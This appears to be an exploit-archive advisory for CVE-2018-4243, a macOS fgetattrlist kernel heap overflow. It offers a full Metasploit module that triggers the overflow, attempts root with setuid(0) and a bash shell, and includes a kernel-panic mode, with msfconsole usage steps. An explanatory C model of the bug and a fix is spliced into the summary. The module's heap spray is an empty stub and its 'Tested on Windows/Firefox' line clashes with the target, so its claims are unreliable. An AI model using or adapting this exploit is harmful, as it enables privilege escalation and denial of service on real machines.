CVSS : 9.3 / 10 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Description : Proof of concept Metasploit module that exploits a macOS version 10.13.4 heap overflow vulnerability. A kernel heap overflow exists in fgetattrlist due to missing lower-bound buffer size validation when writing returned attributes to caller-supplied...
Basic Information
ID : PACKETSTORM:214546
Published : Jan 29, 2026 at 00:00
Affected Product :
Affected Versions :
=============================================================================================================================================
| # Title : macOS 10.13.4 (17E199) Heap Overflow Via fgetattrlist – Local Privilege Escalation (XNU kernel) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://apple.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212496/ & CVE-2018-4243
[+] Summary : A kernel heap overflow exists inside the macOS implementation of fgetattrlist.
The vulnerability occurs due to incorrect handling of user-controlled buffer sizes.
Specifically:
  - The kernel allocates its internal structures using ulmin(bufferSize, fixedsize + varsize).
  - Later, data beyond bufferSize is written into user memory.
  - There is no lower-bound safety check for the case where bufferSize is smaller than the size the kernel expects.
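To make the size-accounting mistake described above concrete without involving a kernel, here is an added user-space model (written for this page; it is not part of the advisory and not XNU code). It reproduces the two steps the summary names: the allocation is sized as ulmin(bufferSize, fixedsize + varsize), and the serializer then emits the full fixedsize + varsize bytes regardless. A sentinel-filled arena stands in for the memory that follows the allocation, so the number of bytes written past it can be measured, and a hardened variant shows one lower-bound check that closes the gap. All names (attr_model_*, simulate_write, ARENA_LEN, SENTINEL) and the sizes used in main are constructed for the example; the hardened check is one reasonable fix, not a claim about Apple's patch.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model, not XNU code: the "kernel allocation" is the first
 * alloc_len bytes of a fixed arena; everything after it holds a sentinel so
 * that any write past the allocation can be counted. */
#define ARENA_LEN 256
#define SENTINEL  0xCC

struct attr_model_result {
    size_t needed;     /* fixedsize + varsize: what the serializer emits */
    size_t alloc_len;  /* what was reserved: ulmin(bufferSize, needed) */
    size_t clobbered;  /* sentinel bytes overwritten beyond alloc_len */
    int    error;      /* 0, or ERANGE when the hardened path refuses */
};

static size_t ulmin(size_t a, size_t b) { return a < b ? a : b; }

/* Write write_len attribute bytes at the start of a sentinel-filled arena and
 * count how many bytes beyond alloc_len no longer hold the sentinel. */
static size_t simulate_write(size_t alloc_len, size_t write_len) {
    unsigned char arena[ARENA_LEN];
    size_t i, clobbered = 0;
    memset(arena, SENTINEL, sizeof arena);
    if (write_len > sizeof arena) write_len = sizeof arena; /* keep the model in bounds */
    memset(arena, 0xAA, write_len);                          /* constructed attribute payload */
    for (i = alloc_len; i < sizeof arena; i++)
        if (arena[i] != SENTINEL) clobbered++;
    return clobbered;
}

/* Vulnerable pattern from the summary: reserve the smaller of the two sizes,
 * then serialize the full attribute set anyway (no lower-bound check). */
struct attr_model_result attr_model_vulnerable(size_t fixedsize, size_t varsize,
                                               size_t buffer_size) {
    struct attr_model_result r = {0};
    r.needed = fixedsize + varsize;
    r.alloc_len = ulmin(buffer_size, r.needed);
    r.clobbered = simulate_write(r.alloc_len, r.needed);
    return r;
}

/* Hardened pattern (one reasonable fix, not necessarily Apple's): refuse a
 * caller buffer that cannot hold the fixed part plus the requested variable
 * part before anything is reserved or written. */
struct attr_model_result attr_model_hardened(size_t fixedsize, size_t varsize,
                                             size_t buffer_size) {
    struct attr_model_result r = {0};
    r.needed = fixedsize + varsize;
    if (buffer_size < r.needed) {
        r.error = ERANGE;
        return r;
    }
    r.alloc_len = r.needed;
    r.clobbered = simulate_write(r.alloc_len, r.needed);
    return r;
}

int main(void) {
    /* Constructed sizes: a 4-byte length word plus 60 bytes of requested
     * attributes, offered a 16-byte caller buffer (the size the PoC passes). */
    struct attr_model_result v = attr_model_vulnerable(4, 60, 16);
    struct attr_model_result h = attr_model_hardened(4, 60, 16);
    printf("vulnerable: needed=%zu alloc=%zu clobbered=%zu\n",
           v.needed, v.alloc_len, v.clobbered);
    printf("hardened:   error=%d (ERANGE=%d) clobbered=%zu\n",
           h.error, ERANGE, h.clobbered);
    return 0;
}
```

The model makes the defender's point visible: with a 16-byte caller buffer and 64 bytes of attributes, the vulnerable path reserves 16 bytes and still writes 64, so 48 bytes land past the allocation; the hardened path rejects the call before any write. When bufferSize is at least fixedsize + varsize, both paths behave identically, which is why the missing check went unnoticed on well-formed callers.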
[+] Author :
  Original PoC & Research: Indoushka
  MSF Ruby Port & Reporting: Indoushka
  Previous reference: Ian Beer (Project Zero, 2016)
[+] Release Date : 2018-06-05
[+] Severity : High / Kernel-Level / Local Privilege Escalation
[+] Affected Systems :
  macOS 10.13.4 (17E199) confirmed vulnerable
  Earlier versions suspected vulnerable
  64-bit kernel heap architectures
[+] Usage :
  msfconsole
  use exploit/osx/local/cve_2018_4243
  set MODE 1
  run
[+] POC :
##
# macOS CVE-2018-4243 Local Privilege Escalation & Kernel Panic
#
require 'msf/core'
require 'ffi'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'macOS CVE-2018-4243 LPE via fgetattrlist Heap Overflow',
      'Description'    => %q{
        Local privilege escalation exploit by triggering kernel heap overwrite
        during volume attribute serialization. Includes heap spray, FD grooming,
        overflow, and panic fallback.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Original C PoC: Indoushka',
        'Ruby MSF Port: Indoushka'
      ],
      'Platform'       => ['osx'],
      'Arch'           => ARCH_X64,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['macOS >=10.13', {}]],
      'DisclosureDate' => '2018-06-05'
    ))

    register_options(
      [
        OptInt.new('MODE', [true, '1=LPE attempt, 2=Kernel panic PoC', 1])
      ]
    )
  end

  #
  # ---------- Ruby FFI syscalls ----------
  #
  module MacOS
    extend FFI::Library
    ffi_lib FFI::Library::LIBC

    class AttrList < FFI::Struct
      layout :bitmapcount, :uint32,
             :reserved,    :uint32,
             :volattr,     :uint32,
             :dirattr,     :uint32,
             :fileattr,    :uint32,
             :forkattr,    :uint32,
             :commonattr,  :uint32
    end

    attach_function :open, [:string, :int], :int
    attach_function :close, [:int], :int
    attach_function :fgetattrlist, [:int, :pointer, :pointer, :ulong, :ulong], :int
    attach_function :setuid, [:uint32], :int
    attach_function :getuid, [], :int
    attach_function :system, [:string], :int
  end

  #
  # Heap spray simulation (logical)
  #
  def heap_spray
    print_status("[*] Starting heap spray (symbolic in ruby)")
    # Demonstration only
  end

  #
  # Overflow trigger using small controlled buffer
  #
  def overflow_trigger(fd)
    al = MacOS::AttrList.new
    al[:bitmapcount] = 5
    al[:volattr] = 0xfff
    al[:commonattr] = 0x20000
    buf = FFI::MemoryPointer.new(:char, 16)
    buf.write_bytes("\xaa" * 16)
    res = MacOS.fgetattrlist(fd, al, buf, 16, 0)
    print_status("[+] Overflow triggered, return=#{res}")
  end

  #
  # Local Privilege Escalation attempt
  #
  def attempt_root
    print_status("[*] Attempting setuid(0)")
    if MacOS.setuid(0) == 0 && MacOS.getuid() == 0
      print_good("[+] Root obtained!")
      MacOS.system("/bin/bash")
      return true
    end
    print_error("[-] Still user uid=#{MacOS.getuid()}")
    return false
  end

  #
  # Kernel panic fallback mode
  #
  def panic_fallback
    print_warning("[!] Triggering fallback kernel panic")
    fd = MacOS.open("/", 0)
    al = MacOS::AttrList.new
    al[:bitmapcount] = 5
    al[:commonattr] = 0x20000
    buf = FFI::MemoryPointer.new(:char, 4)
    MacOS.fgetattrlist(fd, al, buf, 4, 0)
    MacOS.close(fd)
  end

  #
  # ---------------- Main Exploit Logic ----------------
  #
  def exploit
    print_status("[*] macOS CVE-2018-4243 Exploit (Ruby MSF)")
    mode = datastore['MODE'].to_i

    fd = MacOS.open("/", 0)
    if fd < 0
      print_error("Failed to open /")
      return
    end

    heap_spray
    overflow_trigger(fd)

    case mode
    when 1
      print_status("[*] LPE Attempt mode")
      if attempt_root
        print_good("[+] Exploit Complete with root shell")
      else
        print_error("[-] Exploit failed to gain root")
      end
    when 2
      print_status("[*] Panic mode")
      panic_fallback
    end

    MacOS.close(fd)
    print_status("[*] Module finished")
  end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================